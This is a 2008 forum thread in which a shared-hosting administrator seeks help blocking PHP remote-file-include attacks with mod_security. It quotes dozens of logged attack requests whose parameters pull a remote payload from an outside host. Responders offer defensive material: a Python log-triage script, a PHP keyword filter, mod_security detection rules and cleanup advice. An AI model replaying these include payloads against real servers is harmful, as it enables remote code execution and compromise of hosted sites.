Solved

Anybody know how to block this specific PHP Inject attack using Mod_Security2 in CPanel  ?

Posted on 2008-06-16
Last Modified: 2012-06-27
Hi,

I would like to request assistance.

Does anybody know how to block the following "WEB-PHP remote include path" attack using mod_security?

I have tried using the default Mod_Security rules and also the Mod_Security rules from http://www.timmit.nl/modsec2.user.conf.

But it seems that mod_security is not functioning well, in that the PHP inject script is still able to run on my server.

The following are the "WEB-PHP remote include path" entries that I mentioned, taken from the Apache access log.


=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

====================================



I would appreciate it if anybody can help to stop this attack.

Thank you,

Regards,
Sham
0
Comment
Question by:smksa
13 Comments
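The question above asks how to tell, from the access log, which requests are remote-include probes and where they come from. The Python script below is an added example (not code from this thread, from cPanel or from mod_security): it parses Apache common-log lines like the ones quoted, percent-decodes each query parameter repeatedly (the log shows both %3f and double-encoded %253f payloads), flags every parameter whose decoded value is itself a URL, and tallies the hits by client IP, parameter name and response status. The embedded sample log is constructed from a few of the quoted lines plus one benign request from a made-up client 10.0.0.5.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed sample in the Apache common-log format of the question's log: four
# lines taken from it (one with a double-encoded %253f payload) and one benign
# request from a made-up client 10.0.0.5.
SAMPLE_LOG = """\
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
10.0.0.5 - - [16/Jun/2008:03:05:00 +0800] "GET /index.php?page=about&lang=en HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is itself a URL is the signature of a remote-include
# attempt (the log only shows http://; https and ftp are covered here as well).
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def fully_decode(text, max_rounds=3):
    """Percent-decode until nothing changes (bounded), so a double-encoded payload
    such as %253f is seen as it would be after a second decode: %3f -> ?"""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def parse_line(line):
    """Split one common-log line into its fields; None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_include_params(target):
    """Yield (name, value) for every query parameter whose decoded value is a URL."""
    query = target.partition("?")[2]          # everything after the first '?'
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        if REMOTE_URL_RE.match(value):
            yield name, value


def triage(log_text):
    """One finding per (log line, suspicious parameter), in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in remote_include_params(rec["target"]):
            findings.append({"ip": rec["ip"], "time": rec["time"], "param": name,
                             "value": value, "status": rec["status"]})
    return findings


def summarize(findings):
    """Tallies for the questions raised in the thread: which client IPs send the
    probes, which parameter names they target, and how often the server answered
    200 (the page ran) rather than 404/406 (nothing there, or request refused)."""
    return {
        "by_ip": Counter(f["ip"] for f in findings),
        "by_param": Counter(f["param"] for f in findings),
        "by_status": Counter(f["status"] for f in findings),
    }


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f'{f["ip"]:16} {f["status"]} {f["param"]}={f["value"]}')
    print(summarize(triage(SAMPLE_LOG)))
```

Run it against the real log with `triage(open("/path/to/access_log").read())`; a hit whose status is 200 marks a page that executed with the injected parameter and deserves a look first.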
 
LVL 48

Assisted Solution

by:hernst42
hernst42 earned 100 total points
ID: 21800265
0
 
LVL 2

Author Comment

by:smksa
ID: 21800306
But I have already disabled allow_url_fopen and already installed SUHOSIN.

I did that on 8th June and the attack still happened..

I don't know how to check which domain/hosting account is involved based on the Apache access log.
0
 
LVL 48

Expert Comment

by:hernst42
ID: 21800322
You will still get those things in the log even if mod_security is installed. The effect is that the attacks won't stop, but nothing happens on your server. Every web server is under attack from bots/scripts, ... and each attempt is typically logged in the log.
0
 
LVL 2

Author Comment

by:smksa
ID: 21800365
Ehm ....

I think the attack is still happening on my server because today I received a report from my datacenter that there is hacking activity against other servers from my server using this PHP inject method...

Their email is as follows:



-----Original Message-----
From: soc@brasiltelecom.com.br [mailto:soc@brasiltelecom.com.br]
Sent: Monday, June 16, 2008 5:29 AM
Cc: cert@cert.br
Subject: Incident ID: BRT563785 Sent to abuse@piradius.net
Importance: High


Dear Sirs,

   It was detected on Brasil Telecom's monitoring systems that the machine listed in this mail has been maliciously used. The traffic details are below (note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).

Please respond accordingly to this incident.


   Therefore the IP 124.217.243.21 will be blocked on all our Data Centers for 60 minutes.

   To reply to this e-mail, please keep the ID BRT563785 in the Subject field.


Thanks,

CSIRT Brasil Telecom
2008-06-15 05:55:43 GMT
124.217.243.21 1:2002 WEB-PHP remote include path


Dear responsible parties,

   Brasil Telecom's security monitoring has identified that the machine listed below is being used for malicious purposes on the Internet (note that the date is in the following format: YYYY-MM-DD HH:MM:SS). Please take the appropriate actions regarding this incident.

   Because of this, the IP 124.217.243.21 will be blocked for 60 minutes in all our data centers.
   When replying to this e-mail, keep the ID BRT563785 in the subject field.


Regards,


Brasil Telecom CSIRT

For more information about the detected activity, visit:

http://www.snort.org/pub-bin/sigs.cgi?sid=1:2002


---

This message was sent automatically by the SOC - Security Operations Center of Brasil Telecom S.A. and may contain privileged and/or confidential information and may not be forwarded. Should further clarification or action by the Security Incident Response team be required, please contact the SOC by telephone at +55(61)3305-5565 (24x7 service) or by e-mail at soc.nivel1@brasiltelecom.com.br.




I would really appreciate it if anybody can help.
0
 
LVL 29

Assisted Solution

by:fibo
fibo earned 100 total points
ID: 21800646
These attacks are really frequent.
There are 2 aspects to defense:
1 - prevent your site from being hacked
2 - gracefully send these attacks somewhere else

In a similar situation, I was lucky enough to be sure that NO legitimate use of my pages should have any "http://" type of content.
Thus I created an .htaccess which returned a 404 error whenever "http://" was detected in the URL argument.
- the advantage is that this redirection, although it uses some CPU on the web server, does not launch any PHP resource, while at the same time effectively "hiding" these pages from those attacks which try to include code or to report to the "botnet shepherd"

In another situation, there were cases where http:// was part of a legitimate URL.
Since I am more comfortable with PHP than with mod_rewrite, I created a small PHP script that was then included at the beginning of each PHP script.
You might tailor it to your own use. See the additional notes after the code.
--------------------------
<?php
/** checks for hack attempts **/
// The 'xxx' prefix guarantees that any match lies at position > 0, so strpos()
// never returns 0 for a real hit (it returns false when the pattern is absent).
$la_ligne = trim('xxx' . @$_SERVER['QUERY_STRING']);
$my_ligne = 0; // initialised so a short query string does not leave it undefined
if (3 < strlen($la_ligne)) {  // search for attack-specific patterns
    $my_ligne = strpos($la_ligne, 'absolute_p')
              + strpos($la_ligne, 'catid=http://')
              + strpos($la_ligne, 'option=http://')
              + strpos($la_ligne, '_REQUEST')
              + strpos($la_ligne, 'password')
              + strpos($la_ligne, 'GLOBALS=');  // false counts as 0, so the sum is > 0 iff something matched
}
$my_ligne = (0 < $my_ligne);
if ($my_ligne) { // you might create some more elaborate defensive answers...
    header("HTTP/1.1 404 Not Found");
    exit; // stop processing if attacked
}
unset($la_ligne, $my_ligne); // clears the defense variables
// proceed with normal activity
?>
--------------------------
Notes on the PHP code:
- put the include at the beginning of your code; be sure that there is no trailing space or other character
- adapt the detection and the answer to your special case
- this PHP code uses some CPU resources to run the PHP script... try to be as fast as possible in case of multiple botnet attacks

General notes:
- your logs show that in most cases the page was successfully run (return code 200), even if the attack itself failed; this tells the robot that it can try some other attack; returning a 404 tells the robot there is nothing to find there: it will then switch to some other page of your site, and later to some other site
- be sure to protect everything that needs to be protected.
-- Usually all dirs should be chmod 705, except directories where files might be uploaded
-- check that every directory has an index file, whether index.htm, index.html or index.php: without an index, the directory might be readable, giving some ideas of scripts etc. The minimum would be an empty index.htm file, but you can put a simple index.php file:
<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
exit;
?>
-- check that all your script files are chmod 444 (or 544 in some cases), including all your index.* files
-- if you have any 'install', 'installation', 'config' or 'administration' directory... you should probably delete it or (more safely) chmod it to 000; same for scripts with similar names: chmod them to 000 [you might need some config files to be chmod 400]
-- chase ALL your directories for files which look foreign, just in case one hack succeeded and a trojan is now running on your site... if there are any: a/ take (but don't run!) a backup copy; b/ either delete or chmod 000 the file
- in your case, the attack relies on a library of exploits currently hosted on the server http://www.m-comp.nl; in most situations, these sites are legitimate and do not even know that they have been hacked! You should send a mail to postmaster, webmaster and abuse@m-comp.nl telling them that your site has been heavily attacked by robots trying to force the use of resources extracted from their site, that they have probably been infected, and that you would appreciate it if they could clean this library and any other extra files that a hacker might have put there.
- this part of the log shows that a large number of attacks come from IP address 124.217.243.21; you might consider emailing the corresponding ISP (http://www.ip-adress.com/whois/124.217.243.21) (but don't hold your breath, this will probably have no impact); anyway, this IP has now been blocked by your ISP and should not bother you anymore
- this part of the log also shows that queries are sent from 127.0.0.1, which is YOUR SERVER, which presumably has already been hacked... some of the suggestions above will probably have cleaned that!

0
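fibo's answer blocks the probes per script (a 404 whenever "http://" appears in the query string). On a shared cPanel server the same check belongs in the Apache configuration, where it covers every hosted account at once. The rules below are an added example of that, written for mod_security 2; they are not code from this thread, from cPanel, or from the timmit.nl or 403security rule sets, and the rule ids 900100/900101 are placeholders chosen here.

```apache
# Added example, not the thread's own rules: server-wide mod_security 2 rules
# for the cPanel/Apache configuration, so no customer .htaccess or PHP file has
# to be edited.  Rule ids 900100/900101 are placeholders chosen here.
SecRuleEngine On
SecRequestBodyAccess On

# Answer with 404, as fibo's PHP check does: the bot sees "nothing here"
# instead of the 200 that the question's log shows for the probed pages.
SecDefaultAction "phase:2,log,deny,status:404,t:none"

# Any argument whose decoded value is itself a URL is a remote-include attempt
# (path_escape=, skin_dir=, basepath=, sourcedir=, ... in the log).  The extra
# urlDecodeUni pass inspects double-encoded payloads such as fonts.txt%253f%253f
# the way PHP would after the application decodes them a second time.
SecRule ARGS "@rx ^\s*(?:https?|ftps?)://" \
    "id:900100,phase:2,t:none,t:urlDecodeUni,t:lowercase,msg:'PHP remote file include attempt'"

# The same log also carries register_globals-style overwrites of PHP
# superglobals (_REQUEST[option]=, _REQUEST[Itemid]=, GLOBALS=), which no
# legitimate form submits as parameter names.
SecRule ARGS_NAMES "@rx ^(?:_request|_get|_post|_server|_cookie|globals)(?:\[|$)" \
    "id:900101,phase:2,t:none,t:urlDecodeUni,t:lowercase,msg:'PHP superglobal injected as parameter name'"

# A site that legitimately passes URLs in its own parameters (fibo's second
# situation) can be exempted inside its <VirtualHost> with:
#   SecRuleRemoveById 900100
```

Watch the audit log after enabling the rules: a customer application that stores a URL in a form field will trip 900100, and that is the account to exempt rather than a reason to drop the rule.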
 
LVL 2

Author Comment

by:smksa
ID: 21800801
Hi Fibo,

Thanks for the advice.

But this server is actually a shared hosting server using cPanel.

I cannot do it on a per-script basis; those scripts might belong to our hosting clients.
0
 
LVL 29

Expert Comment

by:fibo
ID: 21801126
Using cPanel, you have access to the file directories, right?
- You can then check and clean the directories for unwanted "eggs" in your "nest"
- you can add "index.htm" or "index.php" in the directories where needed.
- You can change access rights to the directories



<<I cannot do it on a per-script basis; those scripts might belong to our hosting clients.>>
I presume you mean "hosting provider".
I presume you have installed scripts through cPanel. The scripts (e.g. PHP) present on your site are now "your copy" and you may change them as you will (check that with your provider, of course), although you will get no support for your changes.
Changing PHP scripts needs some PHP knowledge, but you don't need to be a complete expert.
You might also ask for some (charged) assistance from your provider.
0
 
LVL 2

Author Comment

by:smksa
ID: 21801173
Hi Fibo,

Thanks for your advice again.

But actually we are the hosting provider, and we received the report (the email attached to my previous post) saying that our shared hosting server has been used to maliciously hack other people's servers using PHP inject scripts.

I have around 300 domains hosted on the server.

The problems are:

1. I have no idea which scripts or domain cause the error, which makes me think mod_security is the best way to block it.

2. I cannot alter my clients' PHP files or .htaccess without their knowledge, and what's more I don't even know which hosting account or scripts have been used for the PHP inject activities.

I would appreciate it if you could advise based on that.
0
 
LVL 29

Expert Comment

by:fibo
ID: 21802148
OK. Sorry, I was completely in the wrong direction.

- Are you the piradius.net reported in the mail?
- Is the IP address 124.217.243.21 part of yours? Are there specific hosts on this machine?
- If this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERS' SITES...

Some random thoughts/questions

- mod_security seems to be htaccess/mod_rewrite based and I would think you cannot use them without your customers' consent, and so it should be ruled out as a general solution.

- what does your clients' contract say? Who is responsible for their own account security?

- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their own sites).

- are their sites hosted physically on the same machine as yours? Are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
- I presume you are taking backups of everything, including their sites. If not, you should, until things seem fairly back to normal: it will ensure that, in case of a major problem, the disruption will be as short as possible.

0
 
LVL 2

Author Comment

by:smksa
ID: 21803957
Hi,

Thanks for the advice and your comment.

Refer to your question :

- Are you the piradius.net reported in the mail?

>> No, piradius.net is our IP provider.

- Is the IP address 124.217.243.21 part of yours? Are there specific hosts on this machine?

>> Yes, 124.217.243.21 is the main shared IP for this server.

- If this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERS' SITES...

>> I don't think so; referring to the logs, 127.0.0.1 and 124.217.243.21 are normal when accessing an APACHE 2.28 webserver. It is the way Apache logs now (new version). 100++ of my other servers also have the same log style when people access the websites hosted on the server.


Some random thoughts/questions

- mod_security seems to be htaccess/mod_rewrite based and I would think you cannot use them without your customers' consent, and so it should be ruled out as a general solution.

>> We are providing a shared hosting service in which, security-wise, we can alter any of our terms of service and SLA.

- what does your clients' contract say? Who is responsible for their own account security?

>> Their own account security is of course their responsibility, but the overall server setup is our responsibility.

- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their own sites).

>> No, this is the overall Apache server log that logs everything accessed using Apache 2.28.

- are their sites hosted physically on the same machine as yours? Are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).

>> Of course not; we manage more than 5000 hosting accounts on a few of our servers.

- I presume you are taking backups of everything, including their sites. If not, you should, until things seem fairly back to normal: it will ensure that, in case of a major problem, the disruption will be as short as possible.

>> Yes, we have a mirror backup: daily, weekly and monthly backups on a separate server.


0
 
LVL 29

Expert Comment

by:fibo
ID: 21805512
OK.
Everything seems fine except your own server.

Therefore, and since your clients' directories are not under your own, you can do "whatever you want" on your own web site: you can change your own scripts as needed, etc.

The problem is then
a - your site, and probably some others as well, are under attack from one or several hacked sites at IP address 124.217.243.21
b - one of those is most probably your own site (127.0.0.1)
c - you have found no easy way to check which of the sites is/are originating the "sniffing" of the attacks.

My thoughts:
1 - your own site needs to be cleaned, using all or some of my suggestions or equivalent.
2 - Once this is done (i.e., you have found and cleaned at least one source of the scripts), check in the logs whether the attacks still persist. If not, MAYBE the problem is solved for now. If yes... are there still attacks coming from 127.0.0.1? If not... MAYBE your machine is cured, and some other is not.
3 - To chase other machines: if you have the legal right to do so, look at their sites' log files: are there other sites under attack? From which IPs? Are there any from 127.0.0.1? If yes, then probably these very sites have been hacked. But here you need to work with your clients to clean their sites...

4 - The sites are running on Apache, presumably on Linux. Check the whole disks with anti-virus software. Most recent anti-virus products also look for this type of trojan...

Good hunting!
0
 
LVL 2

Accepted Solution

by:
smksa earned 0 total points
ID: 21840122
Hi,

I managed to resolve this issue by using the Mod_security rules at:

http://403security.org/files/modsec_rules.txt

Now, there are no more such attempts happening on this server.
0
 
LVL 29

Expert Comment

by:fibo
ID: 21897319
Thx for the points.
0
